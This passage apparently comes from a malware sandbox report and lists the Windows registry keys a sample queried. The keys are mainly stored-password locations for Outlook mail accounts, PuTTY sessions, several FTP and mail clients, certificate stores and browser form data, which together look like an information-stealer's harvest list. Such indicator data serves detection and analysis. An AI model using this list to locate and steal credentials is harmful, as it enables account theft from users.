Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh HKEY_CURRENT_USER\Software\Adobe\Common HKEY_CURRENT_USER\Software\ChromePlus HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings HKEY_CLASSES_ROOT\FTP++.Link\shell\open\command HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32 HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\FTPServers HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\FTPServers HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\Scripts HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\Scripts HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\PhysicalStores HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\ HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\Certificates HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\CRLs HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\CTLs HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\Keys HKEY_CURRENT_USER\Software\LinasFTP\Site Manager HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_CURRENT_USER\Software\CoffeeCup Software HKEY_LOCAL_MACHINE\Software\CoffeeCup Software HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\FTP HKEY_LOCAL_MACHINE\Software\Nico Mak Computing\WinZip\FTP HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\mru\jobs HKEY_LOCAL_MACHINE\Software\Nico Mak Computing\WinZip\mru\jobs HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Products\0371FF472F1B88D429B65186AF6ED17B HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Installer\Products\0371FF472F1B88D429B65186AF6ED17B HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\0371FF472F1B88D429B65186AF6ED17B HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0371FF472F1B88D429B65186AF6ED17B\InstallProperties HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1822907384-1282624486-319450072-1000\Components\0371FF472F1B88D429B65186AF6ED17B HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0371FF472F1B88D429B65186AF6ED17B HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail HKEY_CURRENT_USER\Software\Microsoft\Windows Mail HKEY_CURRENT_USER\Software\Microsoft\Windows Mail\Salt HKEY_CURRENT_USER\Software\RimArts\B2\Settings HKEY_LOCAL_MACHINE\Software\RimArts\B2\Settings HKEY_CURRENT_USER\Software\Poco Systems Inc HKEY_LOCAL_MACHINE\Software\Poco Systems Inc HKEY_CURRENT_USER\Software\IncrediMail HKEY_LOCAL_MACHINE\Software\IncrediMail HKEY_CURRENT_USER\Software\RIT\The Bat! HKEY_CURRENT_USER\Software\RIT\The Bat!\Users depot HKEY_LOCAL_MACHINE\Software\RIT\The Bat! HKEY_LOCAL_MACHINE\Software\RIT\The Bat!\Users depot HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER\Identities HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Software\Microsoft\Internet Account Manager\Accounts HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Account Manager\Outlook HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Account Manager\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar 